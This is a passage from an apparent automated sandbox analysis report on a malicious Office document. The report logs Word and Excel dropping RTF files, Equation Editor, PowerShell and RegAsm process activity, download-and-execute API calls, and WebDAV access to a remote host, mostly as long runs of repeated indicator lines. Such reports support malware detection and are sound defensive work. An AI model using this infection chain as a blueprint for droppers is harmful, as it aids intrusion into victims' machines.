                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0061956A pushad ; retf 8_2_0061956B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0061CA14 pushad ; retf 0061h8_2_0061CA15
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00292DAB pushfd ; ret 12_2_00292DB1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00292D8D pushad ; ret 12_2_00292DA1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00292DDD push ebx; ret 12_2_00292DEA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0029233D pushad ; retf 12_2_00292351
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00292370 pushfd ; retf 12_2_00292379
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00457186 push ecx; ret 14_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0045E55D push esi; ret 14_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00457AA8 push eax; ret 14_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434EB6 push ecx; ret 14_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002806 push ecx; ret 14_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044693D push ecx; ret 15_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00451D54 push eax; ret 15_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00451D34 push eax; ret 16_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414060 push eax; ret 17_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414060 push eax; ret 17_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414039 push ecx; ret 17_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4

                  Persistence and Installation Behavior

                  barindex
                  Microsoft Office launches external ms-search protocol handler (WebDAV)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\zhort.de@SSL\DavWWWRootJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\zhort.de@SSL\DavWWWRootJump to behavior
                  Office drops RTF file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc.0.drJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: F9C7AC5D.doc.3.drJump to dropped file
                  Office viewer loads remote template
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406EEB ShellExecuteW,URLDownloadToFileW,14_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
